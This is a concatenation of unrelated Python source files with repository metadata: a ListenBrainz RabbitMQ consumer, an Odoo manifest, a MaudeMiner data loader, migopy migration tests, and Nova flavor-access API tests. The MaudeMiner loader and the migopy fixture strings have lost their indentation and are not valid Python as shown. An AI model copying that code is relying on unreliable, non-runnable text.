    def create_and_bind_exchange_and_queue(self, channel, exchange, queue):
        """Declare a fanout exchange and a durable queue, then bind them."""
        channel.exchange_declare(exchange=exchange, exchange_type='fanout')
        channel.queue_declare(callback=lambda x: None,
                              queue=queue, durable=True)
        channel.queue_bind(callback=lambda x: None,
                           exchange=exchange, queue=queue)

    def on_open_callback(self, channel):
        """Channel-open hook: set up the unique-listen queue and start consuming."""
        self.create_and_bind_exchange_and_queue(
            channel, current_app.config['UNIQUE_EXCHANGE'], current_app.config['UNIQUE_QUEUE'])
        channel.basic_consume(
            queue=current_app.config['UNIQUE_QUEUE'], on_message_callback=self.callback)

    def on_open(self, connection):
        """Connection-open hook: open a channel."""
        connection.channel(on_open_callback=self.on_open_callback)

    def init_rabbitmq_connection(self):
        """Connect to RabbitMQ, retrying every 3 seconds until it succeeds."""
        while True:
            try:
                credentials = pika.PlainCredentials(
                    current_app.config['RABBITMQ_USERNAME'], current_app.config['RABBITMQ_PASSWORD'])
                connection_parameters = pika.ConnectionParameters(
                    host=current_app.config['RABBITMQ_HOST'],
                    port=current_app.config['RABBITMQ_PORT'],
                    virtual_host=current_app.config['RABBITMQ_VHOST'],
                    credentials=credentials,
                )
                self.connection = pika.SelectConnection(
                    parameters=connection_parameters, on_open_callback=self.on_open)
                break
            except Exception as e:
                current_app.logger.error(
                    "Error while connecting to RabbitMQ: %s", str(e), exc_info=True)
                time.sleep(3)

    def run(self):
        """Thread body: run the job queue and consume RabbitMQ forever."""
        with self.app.app_context():
            current_app.logger.info("Starting queue stuffer...")
            # Fix: use self.app — the original referenced the module-level name
            # `app`, which only exists when this file runs as a script, so the
            # thread raised NameError from any other entry point.
            self.queue = MappingJobQueue(self.app)

            # start the queue stuffer thread
            self.queue.start()

            while True:
                current_app.logger.info("Starting MBID mapping writer...")
                self.init_rabbitmq_connection()
                try:
                    self.connection.ioloop.start()
                except KeyboardInterrupt:
                    # Fix: the original called self.submit_delivery_tags() here,
                    # but no such method exists on this class, so Ctrl-C always
                    # died with AttributeError before terminating the queue.
                    self.queue.terminate()
                    current_app.logger.error("Keyboard interrupt!")
                    break
                except Exception as e:
                    current_app.logger.error(
                        "Error in MBID Mapping Writer: %s", str(e), exc_info=True)
                    time.sleep(3)
if __name__ == "__main__":
    # Keep the module-level name `app`: MBIDMappingWriter.run() may look it up.
    app = create_app()
    writer = MBIDMappingWriter(app)
    writer.start()
|
metabrainz/listenbrainz-server
|
listenbrainz/mbid_mapping_writer/mbid_mapping_writer.py
|
Python
|
gpl-2.0
| 3,503
|
# -*- coding: utf-8 -*-
##############################################################################
#
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
# Odoo/OpenERP addon manifest for "Convert Selection To Filter".
{
    'name': 'Convert Selection To Filter',
    'version': '1.1',
    'category': 'Web',
    # Fix: corrected the typo "convet" -> "convert" and the too-short RST
    # title underline in this user-facing description.
    'description': """
FILTER BY SELECTION
===================
This module allows you to convert your selected records in a list view to a
search view filter.
""",
    'author': "Mehdi Samadi ",
    'website': 'http://www.webirani.co',
    'license': 'AGPL-3',
    'depends': ['web'],
    # 'external_dependencies': {
    #     'python': ['xlwt'],
    # },
    'qweb': ['static/xml/filter_by_selection.xml'],
    'js': ['static/*/*.js', 'static/*/js/*.js'],
    'installable': True,
    'auto_install': False,
    'web_preload': False,
}
|
smartforceplus/SmartForceplus
|
.local/share/Odoo/addons/8.0/ConvertSelectionToFilter/__openerp__.py
|
Python
|
agpl-3.0
| 1,506
|
from MaudeMiner.core.database import db
from MaudeMiner.core.models import Narrative
from MaudeMiner.utils import update_progress
from MaudeMiner.core.loader.utils import *
from MaudeMiner.settings import LINES_PER_DB_COMMIT
EXPECTED_NUMBER_OF_FIELDS = 6
def load(limit_commits=None):
# ensure tables exists
db.create_tables(["Narratives"])
print " === Loading Narratives === "
files = get_files_with_prefix("foitext", excludes=["foitextChange", 'foitextAdd'])
num_commits = 0
for line in files:
v = split_fields(line)
if len(v) != EXPECTED_NUMBER_OF_FIELDS:
continue
narrative = Narrative()
narrative.report_key = v[0]
narrative.text_key = v[1]
narrative.text_type_code = v[2]
narrative.patient_sequence_number = v[3]
narrative.date_report = v[4]
narrative.text = v[5]
db.save(narrative, commit=False)
if files.filelineno() % 1000 == 0:
if files.filelineno() % LINES_PER_DB_COMMIT == 0:
db.commit()
update_progress("Loaded: ", files.filelineno(), LINES_IN_CURRENT_FILE[0])
num_commits += 1
if limit_commits and num_commits == limit_commits:
break
db.commit()
print "\n # Done # \n"
|
tklovett/MaudeMiner
|
MaudeMiner/core/loader/narratives.py
|
Python
|
mit
| 1,218
|
#Copyright (C) 2013-2014 by Clearcode <http://clearcode.cc>
#and associates (see AUTHORS).
#
#This file is part of migopy.
#
#Migopy is free software: you can redistribute it and/or modify
#it under the terms of the GNU Lesser General Public License as published by
#the Free Software Foundation, either version 3 of the License, or
#(at your option) any later version.
#
#Migopy is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU Lesser General Public License for more details.
#
#You should have received a copy of the GNU Lesser General Public License
#along with migopy. If not, see <http://www.gnu.org/licenses/>.
import migopy
import subprocess
import pymongo.errors
import unittest
from glob import glob
from tests import TestDirectory
# Fixture files written into the temporary test directory.  The string
# values are literal file contents executed later by `fab`, so they are
# runtime data and must not be edited here.
# NOTE(review): the class/function bodies inside these strings appear to
# have lost their indentation — confirm against the original fixtures.
files = dict()
files['fabfile.py'] = """
import migopy
class Migrations(migopy.MigrationsManager):
MONGO_DATABASE = 'migopy_db_test'
migrations = Migrations.create_task()
"""
# Variant fabfile wrapping the migrations task with fabric's @task decorator.
fabfile_with_task = """
import migopy
from fabric.api import task
class Migrations(migopy.MigrationsManager):
MONGO_DATABASE = 'migopy_db_test'
migrations = task(Migrations.create_task())
"""
# Variant fabfile that enables a mongodump before executing migrations.
fabfile_with_mongodump = """
import migopy
class Migrations(migopy.MigrationsManager):
MONGO_DATABASE = 'migopy_db_test'
DO_MONGO_DUMP = True
migrations = Migrations.create_task()
"""
# Two migration fixtures with zero-padded and plain numeric prefixes, to
# exercise ordering of migration files.
files['mongomigrations/001_test.py'] = """
def up(db):
db.test_collection.insert({'test_key': 'test_content'})
def down(db):
pass
"""
files['mongomigrations/2_test.py'] = """
def up(db):
pass
def down(db):
pass
"""
def call(command):
    """Helper for calling shell commands with stdout, stderr handling.

    Runs *command* in a shell, echoes both streams, and returns stderr.
    """
    proc = subprocess.Popen(command, shell=True,
                            stderr=subprocess.PIPE,
                            stdout=subprocess.PIPE)
    # Fix: communicate() drains both pipes concurrently.  The original read
    # stderr to EOF before touching stdout, which deadlocks once the child
    # fills the stdout pipe buffer.
    out, merr = proc.communicate()
    print(merr)
    print(out)
    return merr
class MongoMigrationsIntegratedBehavior(unittest.TestCase):
    """End-to-end checks of the migopy fab tasks against a live MongoDB."""

    def setUp(self):
        class Migrations(migopy.MigrationsManager):
            MONGO_DATABASE = 'migopy_db_test'

        self.Migrations = Migrations
        self.migr_mng = Migrations()
        # Work inside a throw-away directory populated with the fixtures.
        self.tmp_dir = TestDirectory()
        self.tmp_dir.__enter__()
        self.tmp_dir.mkdir('mongomigrations')
        for path, content in files.items():
            self.tmp_dir.create_file(path, content)

    def tearDown(self):
        self.migr_mng.mongo_client.drop_database(self.migr_mng.MONGO_DATABASE)
        self.tmp_dir.__exit__(None, None, None)

    def test_it_connects_with_mongo_database(self):
        self.migr_mng.db.migo_coll.insert({'name': 'migo_test'})
        self.assertFalse(
            self.migr_mng.db.migo_coll.find_one({'name': 'test_migo'}))
        self.assertTrue(
            self.migr_mng.db.migo_coll.find_one({'name': 'migo_test'}))

        # when user data given to connection
        self.migr_mng.db.add_user('migopy', 'migopy_pass')

        class Migrations(migopy.MigrationsManager):
            MONGO_DATABASE = 'migopy_db_test'
            MONGO_USER = 'migopy'
            MONGO_USER_PASS = 'migopy_pass'

        Migrations()
        self.migr_mng.db.remove_user('migopy')

    def test_it_do_fab_migrations(self):
        self.migr_mng.collection.insert({'name': '001_test.py'})
        output = call('fab migrations')
        self.assertIn('2_test.py', output)
        self.assertNotIn('001_test.py', output)

    def test_it_do_fab_migrations_execute(self):
        call('fab migrations:execute')
        output = call('fab migrations')
        self.assertNotIn('001_test.py', output)
        self.assertNotIn('2_test.py', output)
        self.assertTrue(self.migr_mng.db.test_collection.find_one(
            {'test_key': 'test_content'}))
        self.assertIn('All migrations', output)

    def test_it_do_fab_migrations_execute_001_test(self):
        call('fab migrations:execute,001_test.py')
        output = call('fab migrations')
        self.assertNotIn('001_test.py', output)
        self.assertIn('2_test.py', output)

    def test_it_do_fab_migrations_ignore(self):
        call('fab migrations:ignore')
        output = call('fab migrations')
        self.assertNotIn('001_test.py', output)
        self.assertNotIn('2_test.py', output)
        self.assertIn('All migrations', output)

    def test_it_do_fab_migrations_ignore_001_test(self):
        call('fab migrations:ignore,001_test.py')
        output = call('fab migrations')
        self.assertNotIn('001_test.py', output)
        self.assertIn('2_test.py', output)

    def test_it_do_fab_migrations_dbdump(self):
        self.assertEqual(len(glob('mongodumps/*')), 0)
        call('fab migrations:dbdump')
        self.assertEqual(len(glob('mongodumps/*')), 1)

    def test_it_do_dbdump_during_fab_migrations_execute(self):
        self.assertEqual(len(glob('mongodumps/*')), 0)
        self.tmp_dir.create_file('fabfile.py', fabfile_with_mongodump)
        call('fab migrations:execute')
        self.assertEqual(len(glob('mongodumps/*')), 1)

    def test_it_works_with_fabric_task_decorator(self):
        self.tmp_dir.create_file('fabfile.py', fabfile_with_task)
        output = call('fab migrations')
        self.assertNotIn('not found', output, output)
        self.assertIn('2_test.py', output)
        self.assertIn('001_test.py', output)
|
ClearcodeHQ/migopy
|
tests/test_integrations.py
|
Python
|
lgpl-3.0
| 5,392
|
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import mock
from webob import exc
from nova.api.openstack import api_version_request as api_version
from nova.api.openstack.compute import flavor_access \
as flavor_access_v21
from nova.api.openstack.compute import flavors as flavors_api
from nova import context
from nova import exception
from nova import test
from nova.tests.unit.api.openstack import fakes
def generate_flavor(flavorid, ispublic):
    """Build a fake flavor dict shaped like a row from the nova DB layer."""
    flavor = {
        'id': flavorid,
        'flavorid': str(flavorid),
        'root_gb': 1,
        'ephemeral_gb': 1,
        'name': u'test',
        'deleted': False,
        'created_at': datetime.datetime(2012, 1, 1, 1, 1, 1, 1),
        'updated_at': None,
        'memory_mb': 512,
        'vcpus': 1,
        'swap': 512,
        'rxtx_factor': 1.0,
        'disabled': False,
        'extra_specs': {},
        'deleted_at': None,
        'vcpu_weight': None,
        # Normalize any truthy value to a real bool.
        'is_public': bool(ispublic),
    }
    return flavor
# Canned flavors: '0' and '1' are public, '2' and '3' are private.
INSTANCE_TYPES = {
'0': generate_flavor(0, True),
'1': generate_flavor(1, True),
'2': generate_flavor(2, False),
'3': generate_flavor(3, False)}
# Per-project access grants for the private flavors above.
ACCESS_LIST = [{'flavor_id': '2', 'project_id': 'proj2'},
{'flavor_id': '2', 'project_id': 'proj3'},
{'flavor_id': '3', 'project_id': 'proj3'}]
def fake_get_flavor_access_by_flavor_id(context, flavorid):
    """Stub DB call: return the ACCESS_LIST rows matching *flavorid*."""
    return [entry for entry in ACCESS_LIST if entry['flavor_id'] == flavorid]
def fake_get_flavor_by_flavor_id(context, flavorid, read_deleted=None):
    """Stub DB call: look the flavor up in the canned INSTANCE_TYPES table."""
    return INSTANCE_TYPES[flavorid]
def _has_flavor_access(flavorid, projectid):
    """Return True when ACCESS_LIST grants *projectid* access to *flavorid*."""
    return any(entry['flavor_id'] == flavorid and entry['project_id'] == projectid
               for entry in ACCESS_LIST)
def fake_get_all_flavors_sorted_list(context, inactive=False,
                                     filters=None, sort_key='flavorid',
                                     sort_dir='asc', limit=None, marker=None):
    """Stub DB call mimicking flavor_get_all with is_public filtering."""
    if filters is None or filters['is_public'] is None:
        return sorted(INSTANCE_TYPES.values(), key=lambda item: item[sort_key])

    selected = {}
    for flavor_id, flavor in INSTANCE_TYPES.items():
        # A private flavor is still visible when the request's project has
        # been granted access to it.
        if filters['is_public'] and _has_flavor_access(flavor_id, context.project_id):
            selected[flavor_id] = flavor
            continue
        if flavor['is_public'] == filters['is_public']:
            selected[flavor_id] = flavor

    return sorted(selected.values(), key=lambda item: item[sort_key])
class FakeRequest(object):
    """Minimal stand-in for a nova API request object."""
    environ = {"nova.context": context.get_admin_context()}
    api_version_request = api_version.APIVersionRequest("2.1")

    def get_db_flavor(self, flavor_id):
        """Return the canned flavor dict for *flavor_id*."""
        return INSTANCE_TYPES[flavor_id]

    def is_legacy_v2(self):
        """This fake always represents a non-legacy (v2.1) request."""
        return False
class FakeResponse(object):
    """Minimal stand-in for a nova API response object."""
    # Pre-baked body: one flavor plus a two-entry flavor list.
    obj = {'flavor': {'id': '0'},
           'flavors': [
               {'id': '0'},
               {'id': '2'}]
           }

    def attach(self, **kwargs):
        """No-op hook; the real response attaches extension data here."""
        pass
def fake_get_flavor_projects_from_db(context, flavorid):
    """Stub that behaves as though no flavor exists in the API database."""
    raise exception.FlavorNotFound(flavor_id=flavorid)
class FlavorAccessTestV21(test.NoDBTestCase):
"""Tests for the v2.1 os-flavor-access API extension."""
# Controllers under test and the request URL prefix; presumably variant
# test classes override these — confirm in the rest of the file.
api_version = "2.1"
FlavorAccessController = flavor_access_v21.FlavorAccessController
FlavorActionController = flavor_access_v21.FlavorActionController
_prefix = "/v2/fake"
validation_ex = exception.ValidationError
def setUp(self):
    super(FlavorAccessTestV21, self).setUp()
    self.flavor_controller = flavors_api.FlavorsController()
    self.req = FakeRequest()
    self.req.environ = {"nova.context": context.RequestContext('fake_user',
                                                               'fake')}
    # Route the main DB layer to the canned fixtures defined above.
    self.stub_out('nova.db.flavor_get_by_flavor_id',
                  fake_get_flavor_by_flavor_id)
    self.stub_out('nova.db.flavor_get_all',
                  fake_get_all_flavors_sorted_list)
    self.stub_out('nova.db.flavor_access_get_by_flavor_id',
                  fake_get_flavor_access_by_flavor_id)
    # Simulate no API flavors right now
    self.stub_out('nova.objects.flavor._flavor_get_all_from_db',
                  lambda *a, **k: [])
    self.stub_out('nova.objects.Flavor.in_api', False)
    self.stub_out('nova.objects.flavor._get_projects_from_db',
                  fake_get_flavor_projects_from_db)
    self.flavor_access_controller = self.FlavorAccessController()
    self.flavor_action_controller = self.FlavorActionController()
def _verify_flavor_list(self, result, expected):
    # result already sorted by flavor_id
    self.assertEqual(len(result), len(expected))
    for got, want in zip(result, expected):
        self.assertEqual(got['id'], want['id'])
@mock.patch('nova.objects.Flavor._flavor_get_by_flavor_id_from_db',
            side_effect=exception.FlavorNotFound(flavor_id='foo'))
def test_list_flavor_access_public(self, mock_api_get):
    # query os-flavor-access on public flavor should return 404
    with self.assertRaises(exc.HTTPNotFound):
        self.flavor_access_controller.index(self.req, '1')
@mock.patch('nova.objects.Flavor._flavor_get_by_flavor_id_from_db',
            side_effect=exception.FlavorNotFound(flavor_id='foo'))
def test_list_flavor_access_private(self, mock_api_get):
    # Both proj2 and proj3 hold grants on private flavor '2'.
    result = self.flavor_access_controller.index(self.req, '2')
    self.assertEqual(result, {'flavor_access': [
        {'flavor_id': '2', 'tenant_id': 'proj2'},
        {'flavor_id': '2', 'tenant_id': 'proj3'}]})
def test_list_flavor_with_admin_default_proj1(self):
    # proj1 holds no private grants, so only public flavors appear.
    req = fakes.HTTPRequest.blank(self._prefix + '/flavors',
                                  use_admin_context=True)
    req.environ['nova.context'].project_id = 'proj1'
    result = self.flavor_controller.index(req)
    self._verify_flavor_list(result['flavors'], [{'id': '0'}, {'id': '1'}])
def test_list_flavor_with_admin_default_proj2(self):
    # proj2 has been granted access to private flavor '2'.
    req = fakes.HTTPRequest.blank(self._prefix + '/flavors',
                                  use_admin_context=True)
    req.environ['nova.context'].project_id = 'proj2'
    result = self.flavor_controller.index(req)
    self._verify_flavor_list(result['flavors'],
                             [{'id': '0'}, {'id': '1'}, {'id': '2'}])
    def test_list_flavor_with_admin_ispublic_true(self):
        """Admin with is_public=true gets only public flavors (0, 1)."""
        expected = {'flavors': [{'id': '0'}, {'id': '1'}]}
        url = self._prefix + '/flavors?is_public=true'
        req = fakes.HTTPRequest.blank(url,
                                      use_admin_context=True)
        result = self.flavor_controller.index(req)
        self._verify_flavor_list(result['flavors'], expected['flavors'])
    def test_list_flavor_with_admin_ispublic_false(self):
        """Admin with is_public=false gets only private flavors (2, 3)."""
        expected = {'flavors': [{'id': '2'}, {'id': '3'}]}
        url = self._prefix + '/flavors?is_public=false'
        req = fakes.HTTPRequest.blank(url,
                                      use_admin_context=True)
        result = self.flavor_controller.index(req)
        self._verify_flavor_list(result['flavors'], expected['flavors'])
    def test_list_flavor_with_admin_ispublic_false_proj2(self):
        """Admin in proj2 asking is_public=false still gets flavors 2, 3."""
        expected = {'flavors': [{'id': '2'}, {'id': '3'}]}
        url = self._prefix + '/flavors?is_public=false'
        req = fakes.HTTPRequest.blank(url,
                                      use_admin_context=True)
        req.environ['nova.context'].project_id = 'proj2'
        result = self.flavor_controller.index(req)
        self._verify_flavor_list(result['flavors'], expected['flavors'])
    def test_list_flavor_with_admin_ispublic_none(self):
        """Admin with is_public=none gets every flavor."""
        expected = {'flavors': [{'id': '0'}, {'id': '1'}, {'id': '2'},
                                {'id': '3'}]}
        url = self._prefix + '/flavors?is_public=none'
        req = fakes.HTTPRequest.blank(url,
                                      use_admin_context=True)
        result = self.flavor_controller.index(req)
        self._verify_flavor_list(result['flavors'], expected['flavors'])
    def test_list_flavor_with_no_admin_default(self):
        """Non-admin default listing yields only public flavors (0, 1)."""
        expected = {'flavors': [{'id': '0'}, {'id': '1'}]}
        req = fakes.HTTPRequest.blank(self._prefix + '/flavors',
                                      use_admin_context=False)
        result = self.flavor_controller.index(req)
        self._verify_flavor_list(result['flavors'], expected['flavors'])
    def test_list_flavor_with_no_admin_ispublic_true(self):
        """Non-admin with is_public=true gets the public flavors."""
        expected = {'flavors': [{'id': '0'}, {'id': '1'}]}
        url = self._prefix + '/flavors?is_public=true'
        req = fakes.HTTPRequest.blank(url,
                                      use_admin_context=False)
        result = self.flavor_controller.index(req)
        self._verify_flavor_list(result['flavors'], expected['flavors'])
    def test_list_flavor_with_no_admin_ispublic_false(self):
        """Non-admin asking is_public=false still gets only public
        flavors -- private flavors are not exposed to non-admins."""
        expected = {'flavors': [{'id': '0'}, {'id': '1'}]}
        url = self._prefix + '/flavors?is_public=false'
        req = fakes.HTTPRequest.blank(url,
                                      use_admin_context=False)
        result = self.flavor_controller.index(req)
        self._verify_flavor_list(result['flavors'], expected['flavors'])
    def test_list_flavor_with_no_admin_ispublic_none(self):
        """Non-admin with is_public=none still gets only public flavors."""
        expected = {'flavors': [{'id': '0'}, {'id': '1'}]}
        url = self._prefix + '/flavors?is_public=none'
        req = fakes.HTTPRequest.blank(url,
                                      use_admin_context=False)
        result = self.flavor_controller.index(req)
        self._verify_flavor_list(result['flavors'], expected['flavors'])
    def test_show(self):
        """show() annotates the response flavor with
        os-flavor-access:is_public."""
        resp = FakeResponse()
        self.flavor_action_controller.show(self.req, resp, '0')
        self.assertEqual({'id': '0', 'os-flavor-access:is_public': True},
                         resp.obj['flavor'])
        self.flavor_action_controller.show(self.req, resp, '2')
        # NOTE(review): 'id' stays '0' here even though flavor '2' is
        # shown -- FakeResponse appears to carry a fixed flavor body and
        # only the is_public annotation changes; confirm against
        # FakeResponse's definition.
        self.assertEqual({'id': '0', 'os-flavor-access:is_public': False},
                         resp.obj['flavor'])
    def test_detail(self):
        """detail() annotates every listed flavor with is_public."""
        resp = FakeResponse()
        self.flavor_action_controller.detail(self.req, resp)
        self.assertEqual([{'id': '0', 'os-flavor-access:is_public': True},
                          {'id': '2', 'os-flavor-access:is_public': False}],
                         resp.obj['flavors'])
    def test_create(self):
        """create() annotates the created flavor with is_public."""
        resp = FakeResponse()
        self.flavor_action_controller.create(self.req, {}, resp)
        self.assertEqual({'id': '0', 'os-flavor-access:is_public': True},
                         resp.obj['flavor'])
def _get_add_access(self):
if self.api_version == "2.1":
return self.flavor_action_controller._add_tenant_access
else:
return self.flavor_action_controller._addTenantAccess
def _get_remove_access(self):
if self.api_version == "2.1":
return self.flavor_action_controller._remove_tenant_access
else:
return self.flavor_action_controller._removeTenantAccess
    @mock.patch('nova.objects.Flavor._flavor_get_by_flavor_id_from_db',
                side_effect=exception.FlavorNotFound(flavor_id='foo'))
    def test_add_tenant_access(self, mock_api_get):
        """Adding access forwards the body's tenant to the DB layer and
        returns the flavor's resulting access list."""
        def stub_add_flavor_access(context, flavorid, projectid):
            # The tenant from the request body must be passed through
            # unchanged for the flavor id in the URL.
            self.assertEqual('3', flavorid, "flavorid")
            self.assertEqual("proj2", projectid, "projectid")
        self.stub_out('nova.db.flavor_access_add',
                      stub_add_flavor_access)
        expected = {'flavor_access':
                    [{'flavor_id': '3', 'tenant_id': 'proj3'}]}
        body = {'addTenantAccess': {'tenant': 'proj2'}}
        req = fakes.HTTPRequest.blank(self._prefix + '/flavors/2/action',
                                      use_admin_context=True)
        add_access = self._get_add_access()
        result = add_access(req, '3', body=body)
        self.assertEqual(result, expected)
    @mock.patch('nova.objects.Flavor.get_by_flavor_id',
                side_effect=exception.FlavorNotFound(flavor_id='1'))
    def test_add_tenant_access_with_flavor_not_found(self, mock_get):
        """FlavorNotFound from the object layer maps to HTTP 404."""
        body = {'addTenantAccess': {'tenant': 'proj2'}}
        req = fakes.HTTPRequest.blank(self._prefix + '/flavors/2/action',
                                      use_admin_context=True)
        add_access = self._get_add_access()
        self.assertRaises(exc.HTTPNotFound,
                          add_access, req, '2', body=body)
    def test_add_tenant_access_with_no_tenant(self):
        """A missing or empty 'tenant' key fails schema validation."""
        req = fakes.HTTPRequest.blank(self._prefix + '/flavors/2/action',
                                      use_admin_context=True)
        body = {'addTenantAccess': {'foo': 'proj2'}}
        add_access = self._get_add_access()
        self.assertRaises(self.validation_ex,
                          add_access, req, '2', body=body)
        body = {'addTenantAccess': {'tenant': ''}}
        self.assertRaises(self.validation_ex,
                          add_access, req, '2', body=body)
    @mock.patch('nova.objects.Flavor._flavor_get_by_flavor_id_from_db',
                side_effect=exception.FlavorNotFound(flavor_id='foo'))
    def test_add_tenant_access_with_already_added_access(self, mock_api_get):
        """A duplicate grant (FlavorAccessExists) maps to HTTP 409."""
        def stub_add_flavor_access(context, flavorid, projectid):
            raise exception.FlavorAccessExists(flavor_id=flavorid,
                                               project_id=projectid)
        self.stub_out('nova.db.flavor_access_add',
                      stub_add_flavor_access)
        body = {'addTenantAccess': {'tenant': 'proj2'}}
        add_access = self._get_add_access()
        self.assertRaises(exc.HTTPConflict,
                          add_access, self.req, '3', body=body)
    @mock.patch('nova.objects.Flavor._flavor_get_by_flavor_id_from_db',
                side_effect=exception.FlavorNotFound(flavor_id='foo'))
    def test_remove_tenant_access_with_bad_access(self, mock_api_get):
        """Removing a non-existent grant (FlavorAccessNotFound) maps to
        HTTP 404."""
        def stub_remove_flavor_access(context, flavorid, projectid):
            raise exception.FlavorAccessNotFound(flavor_id=flavorid,
                                                 project_id=projectid)
        self.stub_out('nova.db.flavor_access_remove',
                      stub_remove_flavor_access)
        body = {'removeTenantAccess': {'tenant': 'proj2'}}
        remove_access = self._get_remove_access()
        self.assertRaises(exc.HTTPNotFound,
                          remove_access, self.req, '3', body=body)
    @mock.patch('nova.objects.Flavor._flavor_get_by_flavor_id_from_db',
                side_effect=exception.FlavorNotFound(flavor_id='foo'))
    def test_add_tenant_access_is_public(self, mock_api_get):
        """Granting access on a public flavor yields HTTP 409."""
        body = {'addTenantAccess': {'tenant': 'proj2'}}
        req = fakes.HTTPRequest.blank(self._prefix + '/flavors/2/action',
                                      use_admin_context=True)
        # NOTE(review): presumably the 409-on-public behavior is gated
        # on microversion 2.7 -- confirm against the controller.
        req.api_version_request = api_version.APIVersionRequest('2.7')
        add_access = self._get_add_access()
        self.assertRaises(exc.HTTPConflict,
                          add_access, req, '1', body=body)
    @mock.patch('nova.objects.Flavor._flavor_get_by_flavor_id_from_db',
                side_effect=exception.FlavorNotFound(flavor_id='foo'))
    def test_delete_tenant_access_with_no_tenant(self, mock_api_get):
        """A missing or empty 'tenant' key fails schema validation on
        remove as well."""
        req = fakes.HTTPRequest.blank(self._prefix + '/flavors/2/action',
                                      use_admin_context=True)
        remove_access = self._get_remove_access()
        body = {'removeTenantAccess': {'foo': 'proj2'}}
        self.assertRaises(self.validation_ex,
                          remove_access, req, '2', body=body)
        body = {'removeTenantAccess': {'tenant': ''}}
        self.assertRaises(self.validation_ex,
                          remove_access, req, '2', body=body)
class FlavorAccessPolicyEnforcementV21(test.NoDBTestCase):
    """Policy-enforcement checks for the v2.1 flavor-access API."""

    def setUp(self):
        super(FlavorAccessPolicyEnforcementV21, self).setUp()
        self.act_controller = flavor_access_v21.FlavorActionController()
        self.access_controller = flavor_access_v21.FlavorAccessController()
        self.req = fakes.HTTPRequest.blank('')

    def test_add_tenant_access_policy_failed(self):
        """add_tenant_access raises PolicyNotAuthorized when denied."""
        rule_name = "os_compute_api:os-flavor-access:add_tenant_access"
        self.policy.set_rules({rule_name: "project:non_fake"})
        exc = self.assertRaises(
            exception.PolicyNotAuthorized,
            self.act_controller._add_tenant_access, self.req, fakes.FAKE_UUID,
            body={'addTenantAccess': {'tenant': fakes.FAKE_UUID}})
        self.assertEqual(
            "Policy doesn't allow %s to be performed." % rule_name,
            exc.format_message())

    def test_remove_tenant_access_policy_failed(self):
        """remove_tenant_access raises PolicyNotAuthorized when denied."""
        rule_name = ("os_compute_api:os-flavor-access:"
                     "remove_tenant_access")
        self.policy.set_rules({rule_name: "project:non_fake"})
        exc = self.assertRaises(
            exception.PolicyNotAuthorized,
            self.act_controller._remove_tenant_access, self.req,
            fakes.FAKE_UUID,
            body={'removeTenantAccess': {'tenant': fakes.FAKE_UUID}})
        self.assertEqual(
            "Policy doesn't allow %s to be performed." % rule_name,
            exc.format_message())

    def test_extend_create_policy_failed(self):
        """The create extension point must not raise when denied.

        NOTE(review): there is deliberately no assertion -- the extension
        is expected to silently skip annotating the response.
        """
        rule_name = "os_compute_api:os-flavor-access"
        self.policy.set_rules({rule_name: "project:non_fake"})
        self.act_controller.create(self.req, None, None)

    def test_extend_show_policy_failed(self):
        """The show extension point must not raise when denied."""
        rule_name = "os_compute_api:os-flavor-access"
        self.policy.set_rules({rule_name: "project:non_fake"})
        self.act_controller.show(self.req, None, None)

    def test_extend_detail_policy_failed(self):
        """The detail extension point must not raise when denied."""
        rule_name = "os_compute_api:os-flavor-access"
        self.policy.set_rules({rule_name: "project:non_fake"})
        self.act_controller.detail(self.req, None)

    def test_index_policy_failed(self):
        """index raises PolicyNotAuthorized when denied."""
        rule_name = "os_compute_api:os-flavor-access"
        self.policy.set_rules({rule_name: "project:non_fake"})
        exc = self.assertRaises(
            exception.PolicyNotAuthorized,
            self.access_controller.index, self.req,
            fakes.FAKE_UUID)
        self.assertEqual(
            "Policy doesn't allow %s to be performed." % rule_name,
            exc.format_message())
|
vmturbo/nova
|
nova/tests/unit/api/openstack/compute/test_flavor_access.py
|
Python
|
apache-2.0
| 19,273
|
# -*- coding: utf-8 -*-
import json
import random
import re
import os
from django.conf import settings
from django.core import mail
from django.core.cache import cache
from django.test.utils import override_settings
from django.test.client import Client
from django.utils.http import urlunquote
import mock
import pytest
import waffle
from elasticsearch import Elasticsearch
from mock import patch
from pyquery import PyQuery as pq
from waffle.testutils import override_switch
from rest_framework.test import APIRequestFactory
from olympia import amo
from olympia.abuse.models import AbuseReport
from olympia.addons.models import (
Addon, AddonDependency, AddonFeatureCompatibility, AddonUser, Category,
CompatOverride, CompatOverrideRange, Persona, ReplacementAddon,
AddonCategory)
from olympia.addons.utils import generate_addon_guid
from olympia.addons.views import (
DEFAULT_FIND_REPLACEMENT_PATH, FIND_REPLACEMENT_SRC,
AddonAutoCompleteSearchView, AddonSearchView)
from olympia.amo.templatetags.jinja_helpers import numberfmt, urlparams
from olympia.amo.tests import (
APITestClient, ESTestCase, TestCase, addon_factory, collection_factory,
reverse_ns, user_factory, version_factory)
from olympia.amo.urlresolvers import get_outgoing_url, reverse
from olympia.bandwagon.models import Collection, FeaturedCollection
from olympia.constants.categories import CATEGORIES, CATEGORIES_BY_ID
from olympia.constants.licenses import LICENSES_BY_BUILTIN
from olympia.files.models import WebextPermission, WebextPermissionDescription
from olympia.ratings.models import Rating
from olympia.users.models import UserProfile
from olympia.users.templatetags.jinja_helpers import users_list
from olympia.versions.models import (
ApplicationsVersions, AppVersion, Version, VersionPreview)
def norm(s):
    """Normalize a string so that whitespace is uniform and remove whitespace
    between tags."""
    collapsed = re.sub(r'\s+', ' ', str(s)).strip()
    return re.sub(r'>\s+<', '><', collapsed)
def add_addon_author(original, copy):
    """Make both add-ons share an author."""
